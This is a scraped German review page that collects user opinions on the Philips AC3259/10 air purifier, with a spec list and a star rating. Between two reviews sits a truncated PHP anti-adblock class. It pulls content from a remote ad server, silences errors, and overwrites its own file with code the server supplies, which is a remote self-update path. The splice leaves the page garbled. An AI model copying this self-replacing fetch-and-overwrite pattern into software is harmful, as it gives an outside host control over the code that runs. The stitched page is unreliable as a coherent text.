September 17, 2019
  • 12:51 pm meross WLAN Outdoor Steckdose Wasserdicht Smart Home Wi-Fi Außensteckdose mit 2 Ausgänge mit App Fernsteuerung – Einfach zu installieren
  • 10:39 am A++/A+ Golden-Fin 24000 BTU 7 kW Split Klimaanlage INVERTER Klimagerät und Heizung Modell 2017 : Defekten Display!
  • 4:59 pm eyelink pro – die “smartere” IP Kamera und sensorgestütztes Alarmsystem – fernsteuerbar – mit deutscher iOS und Android App : Tolle Kamera mit deutschem Support.
  • 11:29 am VisorTech Funk Überwachungssystem: Digitales Überwachungssystem DSC-720, Ein Rund um Sorglos-Paket für die Sicherheit.
  • 5:59 am PANNOVO Mini Kamera, Voll zufrieden

Der philips air purifier ist kein zwerg und wird demnach in einem großen, stabilen karton geliefert. Zum glück ist er nicht allzu schwer, so dass er sich auch alleine tragen lässt. Das gerät ist schnell ausgepackt und dank der leicht verständlichen bedienungsanleitung in den gängigsten sprachen, kombiniert mit piktogrammen, schnell betriebsbereit. Das herausnehmen und auspacken der filter geht ebenso einfach wie das wiedereinsetzen, danach kann es schon losgehen. Den luftreiniger gibt es mit oder ohne app-steuerung via wlan und so kann das gerät entweder über das gut zugängliche bedienpanel an der oberseite mit der app air matters angesteuert werden. Es sind unterschiedliche betriebsmodi verfügbar, für uns hat sich der autobetrieb mit der einstellung leise als der beste modus erwiesen. In verschiedenen farben wird die luftqualität angezeigt, wem das zu bunt und verspielt ist, der kann das auch einfach abschalten. Das gerät steht bei uns im wohn-esszimmer mit offener küche und arbeitet sehr leise. Es spricht prompt an, sei es ob man eine kerze ausbläst oder am bügeln oder kochen ist. Ich bin jetzt mal auf die blütezeit gespannt, da wird sich dann zeigen wie sich der phillips im lasttest schlägt.

Dieses gerät kommt mir dank meiner chronischen sinusitis und somit ausgeprägter reaktion auf verschmutzte luft, sehr entgegen. Es lässt sich mit und ohne app benutzen. Ich konnte es – nach einem einfachen aufbau – sofort nutzen. Es fügt sich auch sehr gut in den raum ein, nimmt “optisch” und “faktisch” keinen platz weg. Bei mir lief das gerät sehr leise und störungsfrei im hintergrund. Ich konnte schnell besser atmen und bin begeistert. Die farben zeigen genau an, wie gut die luft ist. Das gerät macht das angebot, es problemlos mit w-lan zu verbinden, was ich nicht getan habe, mir reicht die bedienung per hand. Die verarbeitung ist sehr schick, es sieht vom design sehr elegant aus. Ein sehr schöner neuzugang für mich.

  • Feinstaub – ein Begriff, der im Moment in aller Munde ist
  • Saubere Luft innerhalb weniger Minuten
  • arbeitet leise und zuverlässig, recht teuer

requestTimeout / 1000); return $value == 0 ? 1 : $value; } private function getTimeoutMS() { return $this->requestTimeout; } private function ignoreCache() { $key = md5('PMy6vsrjIf-' . $this->zoneId); return array_key_exists($key, $_GET); } private function getCurl($url) { if ((!extension_loaded('curl')) || (!function_exists('curl_version'))) { return false; } $curl = curl_init(); curl_setopt_array($curl, array( CURLOPT_RETURNTRANSFER => 1, CURLOPT_USERAGENT => $this->requestUserAgent . ' (curl)', CURLOPT_FOLLOWLOCATION => false, CURLOPT_SSL_VERIFYPEER => true, CURLOPT_TIMEOUT => $this->getTimeout(), CURLOPT_TIMEOUT_MS => $this->getTimeoutMS(), CURLOPT_CONNECTTIMEOUT => $this->getTimeout(), CURLOPT_CONNECTTIMEOUT_MS => $this->getTimeoutMS(), )); $version = curl_version(); $scheme = ($this->requestIsSSL && ($version['features'] & CURL_VERSION_SSL)) ? 'https' : 'http'; curl_setopt($curl, CURLOPT_URL, $scheme . '://' . $this->requestDomainName . $url); $result = curl_exec($curl); curl_close($curl); return $result; } private function getFileGetContents($url) { if (!function_exists('file_get_contents') || !ini_get('allow_url_fopen') || ((function_exists('stream_get_wrappers')) && (!in_array('http', stream_get_wrappers())))) { return false; } $scheme = ($this->requestIsSSL && function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) ? 'https' : 'http'; $context = stream_context_create(array( $scheme => array( 'timeout' => $this->getTimeout(), // seconds 'user_agent' => $this->requestUserAgent . ' (fgc)', ), )); return file_get_contents($scheme . '://' . $this->requestDomainName . $url, false, $context); } private function getFsockopen($url) { $fp = null; if (function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) { $fp = fsockopen('ssl://' . $this->requestDomainName, 443, $enum, $estr, $this->getTimeout()); } if ((!$fp) && (!($fp = fsockopen('tcp://' . gethostbyname($this->requestDomainName), 80, $enum, $estr, $this->getTimeout())))) { return false; } $out = "GET {$url} HTTP/1.1\r\n"; $out .= "Host: {$this->requestDomainName}\r\n"; $out .= "User-Agent: {$this->requestUserAgent} (socket)\r\n"; $out .= "Connection: close\r\n\r\n"; fwrite($fp, $out); stream_set_timeout($fp, $this->getTimeout()); $in = ''; while (!feof($fp)) { $in .= fgets($fp, 2048); } fclose($fp); $parts = explode("\r\n\r\n", trim($in)); return isset($parts[1]) ? $parts[1] : ''; } private function getCacheFilePath($url, $suffix = '.js') { return sprintf('%s/pa-code-v%s-%s%s', $this->findTmpDir(), $this->version, md5($url), $suffix); } private function findTmpDir() { $dir = null; if (function_exists('sys_get_temp_dir')) { $dir = sys_get_temp_dir(); } elseif (!empty($_ENV['TMP'])) { $dir = realpath($_ENV['TMP']); } elseif (!empty($_ENV['TMPDIR'])) { $dir = realpath($_ENV['TMPDIR']); } elseif (!empty($_ENV['TEMP'])) { $dir = realpath($_ENV['TEMP']); } else { $filename = tempnam(dirname(__FILE__), ''); if (file_exists($filename)) { unlink($filename); $dir = realpath(dirname($filename)); } } return $dir; } private function isActualCache($file) { if ($this->ignoreCache()) { return false; } return file_exists($file) && (time() - filemtime($file) < $this->cacheTtl * 60); } private function getCode($url) { $code = false; if (!$code) { $code = $this->getCurl($url); } if (!$code) { $code = $this->getFileGetContents($url); } if (!$code) { $code = $this->getFsockopen($url); } return $code; } private function getPHPVersion($major = true) { $version = explode('.', phpversion()); if ($major) { return (int)$version[0]; } return $version; } private function parseRaw($code) { $hash = substr($code, 0, 32); $dataRaw = substr($code, 32); if (md5($dataRaw) !== strtolower($hash)) { return null; } if ($this->getPHPVersion() >= 7) { $data = @unserialize($dataRaw, array( 'allowed_classes' => false, )); } else { $data = @unserialize($dataRaw); } if ($data === false || !is_array($data)) { return null; } return $data; } private function getTag($code) { $data = $this->parseRaw($code); if ($data === null) { return ''; } if (array_key_exists('code', $data)) { $this->selfUpdate($data['code']); } if (array_key_exists('tag', $data)) { return (string)$data['tag']; } return ''; } public function get() { $e = error_reporting(0); $url = $this->routeGetTag . '?' . http_build_query(array( 'token' => $this->token, 'zoneId' => $this->zoneId, 'version' => $this->version, )); $file = $this->getCacheFilePath($url); if ($this->isActualCache($file)) { error_reporting($e); return $this->getTag(file_get_contents($file)); } if (!file_exists($file)) { @touch($file); } $code = ''; if ($this->ignoreCache()) { $fp = fopen($file, "r+"); if (flock($fp, LOCK_EX)) { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } else { $fp = fopen($file, 'r+'); if (!flock($fp, LOCK_EX | LOCK_NB)) { if (file_exists($file)) { $code = file_get_contents($file); } else { $code = ""; } } else { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } error_reporting($e); return $this->getTag($code); } private function getSelfBackupFilename() { return $this->getCacheFilePath($this->version, ''); } private function selfBackup() { $this->selfSourceContent = file_get_contents(__FILE__); if ($this->selfSourceContent !== false && is_writable($this->findTmpDir())) { $fp = fopen($this->getSelfBackupFilename(), 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); return false; } ftruncate($fp, 0); fwrite($fp, $this->selfSourceContent); fflush($fp); flock($fp, LOCK_UN); fclose($fp); return true; } return false; } private function selfRestore() { if (file_exists($this->getSelfBackupFilename())) { return rename($this->getSelfBackupFilename(), __FILE__); } return false; } private function selfUpdate($newCode) { if(is_writable(__FILE__)) { $hasBackup = $this->selfBackup(); if ($hasBackup) { try { $fp = fopen(__FILE__, 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); throw new Exception(); } ftruncate($fp, 0); if (fwrite($fp, $newCode) === false) { ftruncate($fp, 0); flock($fp, LOCK_UN); fclose($fp); throw new Exception(); } fflush($fp); flock($fp, LOCK_UN); fclose($fp); if (md5_file(__FILE__) === md5($newCode)) { @unlink($this->getSelfBackupFilename()); } else { throw new Exception(); } } catch (Exception $e) { $this->selfRestore(); } } } } } $__aab = new __AntiAdBlock_2430765(); return $__aab->get();

Wir haben den luftreiniger nun schon länger im einsatz und ich möchte meine erfahrungen hier wiedergeben. Grundsätzlich ist es so, dass der luftreiniger sehr gut auf veränderungen reagiert. Gelangen staubpartikel in den wirkungsbereich, indem man zum bespiel ein kleidungsstück ausschüttelt, so registriert das gerät das sofort und schaltet einen gang hoch. Auch optisch sieht man am farbigen led ring (kann auch für die nacht abgeschaltet werden) eine rückmeldung über den zustand der luft. Ist die unreinheit gefiltert, so schaltet der reiniger im automatikmodus wieder herunter, um den geräuschpegel zu reduzieren. Nach längerem betrieb kann man auch deutlich eine veränderung der luft riechen. Ich verbinde allerdings mit „frischer luft“ aus der natur einen anderen geruch. Die luft die hier ausströmt, hat einen eigenen „duft“. Inwieweit der automatikmodus aber dazu geeignet ist, größere räume zu „säubern“, das ist schwer nachzuvollziehen. Denn die umwälzung der luft im automatikbetrieb ist gering, wenn die luft um das gerät herum als gut erachtet wird.

Der luftreiniger von philips ist nicht gerade zu übersehen. Aber ist sehr handlich, trotz seiner größe, und man kann ihn problemlos fast überall aufstellen. Natürlich sollte man bedenken, dass er ausreichend platz benötigt, um die luft anzusaugen und wieder auszustoßen. Er wird sehr gut eingepackt geliefert und man hat erst einmal eine menge an plastik zu entfernen. Die inbetriebnahme ist an sich nicht weiter schwierig und ein blick in die bedienungsanleitung kann da schon helfen. Wichtig ist es, die filter auszubauen und die folien zu entfernen, damit der lüfter dann ordnungsgemäß arbeiten kann. Das ist unproblematisch, man sollte nur auf die reihenfolge achten, damit man beim zusammenbauen nichts verwechselt. Wenn die filter gereinigt werden müssen, ist das ebenfalls zu beachten. Aber der einbau und ausbau sind leicht zu bewerkstelligen. Man kann diesen luftreiniger auch mit einer app betreiben.

Merkmal der Philips AC3259/10 Luftreiniger Connected (für Allergiker, bis zu 95m², CADR 393m³/h, AeraSense Sensor, mit App-Steuerung) weiß

  • Hochwertige Filter entfernen Pollen, Staub, Bakterien, Viren, ultrafeine Partikel bis zu einer Größe von 0, 02µm und sogar Gerüche und Gase aus der Luft
  • App-Anbindung: Steuerung des Gerätes, Aufzeichnung und Überwachung der Luftqualität, Allergiemanagement
  • AeraSense Technologie informiert in Echtzeit per numerischer Luftqualitätsanzeige und Farbsignal über die aktuelle Luftqualiät
  • Luftreinigungsrate: 393 m³/h, reinigt effektiv Räume bis zu 95 m², geräuscharmer Betrieb
  • 3 Reinigungsmodi und 5 Geschwindigkeitsstufen

Wir haben bisher in unserer wohnung einen luftbefeuchter benutzt, da alle bewohner schnell zu einer trockenen nase neigen und/oder unter einer allergie leiden. Egal ob wohnzimmer oder schlafzimmer, der befeuchter hat uns bisher recht gute dienste geleistet, wenn er auch die beschwerden nicht komplett aus der welt schaffen konnte. Luftbefeuchter gibt es im internet in vielen verschiedenen ausführungen und preisklassen, so wie auch bei „professionellen“ luftreinigern, die sowohl von der größe als auch vom preis in einer ganz anderen liga spielen. Daher waren wir sehr darauf gespannt, ob sich eine investition in ein kostenspieliges gerät tatsächlich für unser problem rentieren würde. Zunächst zum design: der luftreiniger ist wie erwartet relativ groß (37x25x70cm), mit seinen knapp 10kg erstaunlich leicht und macht insgesamt mit seinem aussehen einen sehr modernen eindruck. Wer einen eher „sterilen“ einrichtungsstil hat, wird wohl keine probleme haben, den luftreiniger ins wohnbild einzubringen, in einem gemütlichen landhauswohnzimmer sticht das gerät aber sicherlich (negativ) heraus. Der luftreiniger lässt sich auch von menschen, die nicht technikaffin sind, sehr intuitiv bedienen und aufbauen. Die beiliegende anleitung ist übersichtlich, aber nicht unbedingt von nöten, da die inbetriebnahme recht selbsterklärend ist. Neben fünf geschwindigkeitsstufen sind natürlich die drei verschiedenen reinigungsmodi für uns besonders interessant gewesen. Der automodus ist ein automatisierter modus, der seine leistung der luftverschmutzung anpasst und selbständig arbeitet.

Zum test wurde uns das gerät von philips „philips ac3259/10 luftreiniger connected“ zur verfügung gestellt. Es kommt in einem stabilen karton und mit einer ausführlichen betriebsanleitung. Ausgepackt macht das gerät einen sehr hochwertigen eindruck. Es ist schlicht in weiß gehalten, eine neutrale schöne farbe. Passend daher für viele aufstellmöglichkeiten in verschiedensten räumen. Vor der inbetriebnahme sollte man die abdeckung, die mit magneten fixiert ist abnehmen, um die verpackungsfolie von dem vor- und aktivkohlefilter zu entfernen. Sehr schön gelöst, da kein werkzeug zum tausch benötigt wird. Als testraum diente bei uns das wohzimmer. Da wir oft die terrassentüren auf haben, kommt es mal vor, dass pollen und „frische landluft“ unser gäste sind. Wir steuren unseren luftreiniger von unseren handys aus.

In zeiten, in denen über stark oder sehr stark verschmutzte innenstädte, fahrverbote und luftreinhaltepläne diskutiert wird, die politik der wirtschaft zu liebe die gesundheit der betroffenen menschen aber für eher vernachlässigter hält, in solchen zeiten ist ein solches gerät fast schon als unumgängliche anschaffung zu sehen. Es filtert bis 0,3 mikrometer staub (pm10, also feinstaub, geht von 1 bis 15 mikrometer), sollte also faktisch alle partikel herausfiltern. Schön ist die anzeige der luftqualität, die verbindung mit einer app zur anzeige der luftqualtität und auch zur steuerung des gerätes. Es ist laufruhig (wir haben das ac3259/10)kaufempfehlung für menschen an besonders stark befahrenen straßen, alte menschen, kleine kinder, allergiker.

Ich habe diesen luftreiniger von philips zum testen bekommen. Ich war zunächst etwas skeptisch wofür ein “normaler” haushalt einen solchen luftreiniger gebrauchen könnte. Bisher sind wir schließlich ganz gut ohne ein solches gerät ausgekommen. Umso gespannter war ich deshalb auf den test. Der luftreiniger ist ziemlich groß, aber vom design so schick und etwas futuristisch, sodass er gut in eine modern eingerichtete wohnung passt. Er lässt durch die tragegriffe leicht tragen und verrücken. Wir haben den luftreiniger zunächst in einer ca 70 qm wohnung getestet. Sie liegt an einer mäßig befahrenen straße, in der wohnung liegen zwei größere teppiche und hier wohnt ein freigänger-kater. Nachdem wir den luftreinger in betrieb genommen und mitten in der wohnung aufgestellt haben, misst er zunächst die luftqualität in der wohnung. Wir lagen da anfangs auf stufe 5 auf einer skala von 1 (sehr gut) bis 12 (schlecht).

Geliefert in gemäßigter verpackung, ökologisch hat hier mal echt einer mitgedacht, mir ist so was wichtig. Angeschlossen ist das gerät recht schnell, auf dem karton zeigen einige schaubilder in wenigen schritte für die inbetriebnahmeund sonst kann man zur gut aufgemachten anleitung greifen. Das gerät nur kurz öffnen, zwei filter von ihren schutzfolien befreien,wieder einsetzen und das gerät ist fertig zum benutzen. Die größe von 25,1 x 36,6 x 69,8 ist nicht unerheblich, das gewicht von 9 kg. Auch nicht, aber das wird wohl für ein gerät dasimmerhin auf 95 qmtr. Die bedienung ist simpel weil auf wunsch automatisch, aber der lüfter kann zum beispiel auch händisch geregelt werden, zumso genannten ruhemodus etwa (langsamste geschwindigkeit, besonders leise und die beleuchtung wird runtergedimmt), das istangenehm für eine ungestörte nachtruhe. Für die wenigen tasten ist eine anleitung fast gar nicht notwendig. Die regelmäßige reinigung des luftqualitäts-sensors, des gerätes ist schon etwas mehr arbeit. Der austausch der filter, für deren lebensdauer es verschiedene anzeigen gibt.

Der philips ac3259/10 luftreiniger connected wurde sehr gut und sicher verpackt angeliefert. Und zwischenzeitlich ausgiebig getestet. Der reiniger hat eine ansprechende form und ist mit seinen knapp 10 kilogramm nicht zu schwer. Er besitzt einen tragegriff und ist somit problemlos zu transportieren. Empfohlen wird er für räume bis 95 quadratmeter. Der luftreiniger hat seinen festen platz in einem kleineren zimmer gefunden, dieses ist zudem auch noch relativ stark möbliert, wird aber täglich über viele stunden genutzt. Die luftwerte werden zwischen 1 ( sehr gut ) und 12 ( sehr schlecht ) im display angezeigt, auch gibt es eine farbliche abstimmung ( blau gut/rot schlecht ). Eine verbesserung der luft wird sehr schnell erreicht – und diese ist definitiv spürbar. Im automodus findet die reiniung selbstständig statt. Ein allergiemodus kann zugeschaltet werden, damit werden eine großzahl der allergene aus der luft entfernt.

 wer mit etwas lautstärke leben kann, bekommt ein gerät, das ab stufe 2 eine gute filtration darstellt. Die stufen “leise” und “eins” haben meines erachtens überhaupt keinen nutzen. Nach meiner subjektiven meinung hat man es mit der angabe “bis 95 qm” wieder einmal etwas übertrieben. Solch einen großen raum kann man evtl. Mit der “turbostufe” und positionsänderung reinigen?. Aber für einen festen standort mit erträglicher lautstärke würde ich dem gerät maximal eine raumgröße von 60 qm zugestehen. Ich habe die hier maximal zulässige videozeit von 30 minuten voll ausgeschöpft um euch soviel wie möglich vom gerät und den funktionen zeigen zu können. Das gleiche video in hd steht euch auf youtube mit der suche “qpddf93qqr4” zur oder “mrbowlfish reviews” verfügung. Update:======da nicht jeder das lange video schauen möchte setze ich euch hier mal die von mir gemessenen verbrauchswerte rein. Sl=12 watt / 1 = 13 w / 2 = 23 w / 3 = 30 w und bei turbo = 54 watt.

Dieser philips ac3259/10 luftreiniger connected aerasense sensor dient der reinigung der raumluft von luftgetragenen allergenen und ultrafeinen partikeln. Feinstaub, tierhaare, pollen. Alles was in unserer familie zu allergischen reaktionen führen kann, haben wir mit diesem gerät etwas unter kontrolle. 10kg eigengewicht und produktabmessungen von 36,6 x 25,1 x 69,8 cm ist dies ein wahrnehmbarer luftreiniger. Zwar wirkt der kunststoff des gehäuses hochwertig und ist gut verarbeitet, passt aber wohl in kaum eine wohnung ästhetisch hinein. Das design ist geschmacksache. Für mich wirkt aber alles stimmig. Der hersteller gibt das betriebsgeräusch mit 33db an. Zum vergleich: flüstern ca.

 wenn keine allergien, unangenehme gerüche oder aber belastende schadstoffe vorhanden sind,warum sollte man dann die luft reinigen?meist kann man schädliche partikel und gase nicht wahrnehmen geschweige den sehen,man wundert sich ehr über die symptome wie müdigkeit, konzentrationsschwäche,augenbrennen oder trockenere atemwege. Der philips ac3259/10 luftreiniger connected sorgt definitiv für frische, reine luft in räumen bis 95m². Durch die leicht zugänglichen filter (hepa-filter und aktivkohlefilter) werdenallergenen, rauch, feinstaub, gasen, gerüchen, bakterien und viren aus der luft gefiltert. Der sensor reagiert sehr sensibel und regelt bei bedarf selbstständig die geschwindigkeitsstufen. Das sehr gut erkennbare, digitale display zeigt die luftqualität in echtzeit an. Zusätzlich durch farbsignale wird ebenfalls die raumluftqualität dargestellt. Die beleuchtung kann für die nacht natürlich deaktiviert werden. Wer ein smartphone oder aber tablett besitzt und den luftreiniger über diese geräte steuern möchte,kann dies auch tun, muss allerdings hierfür die app “air matters” downloaden und installieren. Die app ist übersichtlich und gibt ebenfalls in echtzeit auskunft über die raumluftqualität. In der app werden auch die betriebsstunden der beiden filter angezeigt, die man mit der zeit wechseln sollte.

Inbetriebnahme:———————die inbetriebnahme nach dem auspacken ist dank guter anleitung ein leichtes. Nach dem auspacken muss man die frontabdeckung öffnen um an die eingesetzten filter zu gelangen. Die filter muss man von verpackungsmaterialien befreien und dann wieder einsetzen. Nach dem anfassen des filters sollte man sich die hände waschen. Am einfachsten erfolgt die inbetriebnahme in verbindung mit der passenden app „air matters“, erhältlich im app store und im google play store (ios und android). Achtung: die app möchte zugriffberechtigungen für standort, fotos, medien dateien und telefonanrufe. Das letztere kann ich allerdings nicht ganz nachvollziehen, aber sei es drum…. Anschließend schaltet man den luftreiniger ein und sieht das wlan symbol orange blinken. Öffnet man die app kann man unter dem punkt >geräteliste bearbeiten ->+ (geräte verbinden) ->philips< den luftreiniger per wlan mit dem smartphone und dem wlan verbinden. Der luftreiniger lässt sich nur im 2,4 ghz wlan betreiben.

Der luftreiniger kommt extrem gut verpackt, schon fast zuviel des guten. Alles ist nochmals und nochmals verpackt. Hier könnte man etwas reduzieren der umwelt zuliebe. Den punktabzug gebe ich für den sehr hohen preis, der in meinen augen nicht gerechtfertigt ist. Es ist meist plastik und hier wird sicherlich der name mitbezahlt. Die anleitung (die auch nochmals verpackt ist) ist leicht und verständlich, ich habe sie gebraucht, um bei der erst-inbetriebnahme nix falsch zu machen. Das gerät bedienen wir ohne app, wir wollen das nicht. Zu der app möglichkeit kann ich nichts sagen. Das gerät ist sehr leise und wenn der lüfter auf der geringsten stufe steht, kann man super damit schlafen.

Wir wohnen direkt an einer berliner hauptstraße, also genau da, wo man annehmen sollte, dass die belastung durch feinstaub und abgase am höchsten ist. Genau der richtige ort für einen luftreiniger, sollte man denken, aber das ergebnis war dann doch etwas überraschend. Beginnen wir aber am anfang. Mit seiner abmessung von 36,6 x 25,1 x 69,8 cm ist der philips luftreiniger ein ganz schöner brocken, wenn man ihn also so einsetzen will, dass man ihn nicht sieht, hat man eine aufgabe vor sich. Allerdings ist das gerät glücklicherweise nicht gerade hässlich, so dass es gerade mit dem blauen (bei uns) aktiv-licht modern und etwas futuristisch aussieht. Man muss eigentlich nur die folien vom filter entfernen und schon kann der luftreiniger eingesetzt werden, in drei verschiedenen betriebsmodi und fünf geschwindigkeiten. Die luft wird nicht nur gereinigt, sondern auch analysiert und hier ist es, dass wir eine Überraschung erlebt haben. Über die app wurden wir informiert, dass die luftqualität in unserer wohnung top ist und wir das gerät eigentlich gar nicht weiter benutzen müssten. Das wunderte uns doch sehr, da wir, wie erwähnt, an einer hauptstraße wohnen und das fenster oft offen ist. Auch die lichtanzeige ist immer blau und signalisiert so, dass die luftqualität gut ist.

Der philips ac3259/10 luftreiniger ist schon eine hausnummer, nicht nur vom preis, sondern auch von der größe. Er ist aber recht leicht so das man ihn problemlos bewegen kann, und das design ist auch so gewählt das es sich in den meisten haushalten problemlos einfügen lässt. Die inbetriebnahme ist sehr einfach, aufstellen, die filter von ihren folien befreien, einschalten, fertig. Die bedienungsanleitung ist recht übersichtlich und höchstens für die ersten einsätze mal nötig. Die bedienung des luftreinigers ist sonst wirklich sehr einfach und vieles ist selbsterklärend. Der luftreiniger hat 3 verschiedene modis, natürlich lässt sich auch alles einfach manuell einstellen, so zum beispiel die geschwindigkeiststufen. Hiervon gibt es fünf an der zahl. Wir nutzen aber maximal die ersten beiden, denn wir haben einen recht “einfachen” haushalt aus sicht des reinigers, keine tiere und nichtraucher, dazu keine allergien. Für letztere gibt es einen eigenen modus, in diesem filtert er die luft im bedarfsfall 60% effektiver, so dass die sich in der luft befindlichen allergene keine chance haben. Im automodus arbeitet der reiniger selbstständig, er analysiert die luft und im bedarfsfall schaltet er sich ein um die luft zu reinigen.

Der luftreiniger reinigt wohl effektiv bis 96m² und ist daher ausreichend für mittel- bis große räume. Die verarbeitung ist super und die optik modern und schick. Optisch dürfte der also problemlos in jedes wohnzimmer passen. Er besitzt den neuen aerasense-sensor mit luftqualitätsanzeige und einen allergie-modus, dadurch sollen verschmutzungen noch zuverlässiger erkannt werden und in echtzeit informationen über die aktuelle raumluftqualität angezeigt werden. Die verschmutzung der luft wird mit einem schicken led-ring in der mitte des luftreinigers angezeigt. Blau steht für sauber, rot für verschmutzt. Der allergie-modus wird über das display ausgewählt. Dieser modus garantiert wohl eine feinere kopplung von geschwindigkeitseinstellungen und aerasense-sensor und reagiert somit noch empfindlicher auf kleinste Änderungen der luftqualität. Das touch-display wirkt sehr modern und ist sehr intuitiv zu bedienen. Über einzelne menüpunkte können diverse einstellungen am gerät aktiviert werden, beispielsweiße auch die kindersicherung.

Der größte manko an diesem gerät ist wohl der preis. Mit einer uvp von 579,99 € und einem realen preis von knapp 470 € ist das gerät natürlich absolut kein schnäppchen auf den ersten blick. Da ist ein gewicht von knapp 10 kg und einer höhe von knapp 70 cm schon fast wirklich nebensächlich. Das design aber wiederum gefällt mir sehr gut. Mit unseren weißen hochglanz-möbeln fällt das teil fast gar nicht als luftreiniger auf… :-)die bedingung am gerät an sich ist intuitiv und einfach. Das touchdisplay funktioniert gut, obwohl ich bei manchen geräten (waschmaschine, backofen, etc. ) öfters mal probleme habe… irgendwie werde ich nicht so richtig erkannt 🙂 hier funktioniert alles bisher gut. Es lässt sich sogar per app steuern. Das gefällt mir persönlich super, aber die nutzung per app geht mir persönlich jetzt nicht ganz so leicht von der hand. Irgendwie ist mir die direkte bedienung am gerät dann doch etwas lieber…die mitgelieferte anleitung ist gut verständlich und erklärend.

. Und das im wahrsten sinne des wortesdoch nun hat die firma philips mit dem „philips ac3259/10 luftreiniger“ ein gerät auf den markt gebracht, mit dem man so einiges an staub, allergenen, bakterien und sogar viren aus der raumluft filtern kann. Das gerät wurde sehr gut und bruchsicher verpackt geliefert. Im lieferumfang enthalten war, wie eigentlich immer bei philips-geräten, ein ausführliches handbuch (mit piktogramm), in dem schritt für schritt beschrieben wird, wie man den luftreiniger installiert und handhabt. Der download der app „air matters“ aus dem google-playstore auf ein smartphone oder tablet ist kein problem. Dann muss man das gerät ans stromnetz anschließen und mit dem wlan-netz verbinden. Danach die app starten und den direktiven auf dem bildschirm folgen. Hat alles geklappt, dann leuchtet auf dem display des luftreinigers das wlan-zeichen weiß auf. Im handbuch findet man auf seite 42 die entsprechenden informationen (erklärung der einzelnen farben usw. ) zur „luftqualitäts-anzeige“. Und nun kann der „philips ac3259/10 luftreiniger“ für bessere luft in räumen mit einer fläche bis zu ca.

Gerade im frühling, wo viele pollen durch die luft fliegen, ist so ein luftreiniger besonders wertvoll für leute, die allergisch reagieren. Er arbeitet sehr leise und kann auch per app angesteuert werden. Das gerät benötigt sehr viel platz und die handhabung ist nicht sofort wirklich gut erklärt. Man muss also unbedingt in die gebrauchsanleitung schauen. Da steht genau drin, was man einstellen kann, wie man filter wechselt und reinigt. Gerade wenn man viel lüftet ist so ein gerät natürlich ständig im einsatz, da die neue luft ja auch wieder gereinigt werden muss. Die stromkosten sollte man also mit berücksichtigen. Ich gebe dem gerät 4 sterne. Mich stören die großen abmasse und auch die ständigen stromkosten. Ansonsten bekommt man das, was man halt auch haben möchte.

Der vorliegende luftreiniger kommt gut und sicher verpackt im sehr gut mit styropor ausgeschaltem paket ins haus und kann nach dem auspacken sowie dem sehr leichten einsetzen der filter in minutenschnelle sofort in betrieb genommen werden. Der kunststoffklotz wiegt knappe 10 kilo und ist mit seinen maßen von 366 x 251 x 698 mm (l x b x h) zwar kein mini, für seine leistungswerte aber tatsächlich noch kompakt. Das stromkabel ist mit 2 metern ausreichend lang, damit man das gerät auch wirklich für seine individuellen bedürfnisse optimal in der wohnung platzieren kann. Diese sollte laut hersteller nicht mehr als 95 qm haben, und für unsere knapp 80 qm hat das gerät von der ersten inbetriebnahme an einen super job gemacht. Außerdem fiel die beiliegende gebrauchsanweisung sehr positiv durch einfache und verständliche erklärungen auf. Der luftfilter arbeitet in einem der drei einstellbaren modi: “allgemeine modus” (automatik, v. Für die reduktion des hausstaubs), “allergiemodus” (reinigt blütenstaub, pollen oder tierhaar-schuppen aus der raumluft) sowie einem “bakterien- und virenmodus“ (selbsterklärend). Außerdem kann man die geschwindigkeit der luftumwälzung in stufen zwischen 1 und 5 individuell einstellen. Dabei ist er angenehm leise und selbst bei höchster stufe nicht lauter als ein flüsterton (wobei das halt auch jeder anders empfinden mag). Besten Philips AC3259/10 Luftreiniger Connected (für Allergiker, bis zu 95m², CADR 393m³/h, AeraSense Sensor, mit App-Steuerung) weiß Bewertungen

Summary
Review Date
Reviewed Item
Philips AC3259/10 Luftreiniger Connected (für Allergiker, bis zu 95m², CADR 393m³/h, AeraSense Sensor, mit App-Steuerung) weiß
Rating
4,0 of 5 stars, based on 22 reviews
SmartHome

RELATED ARTICLES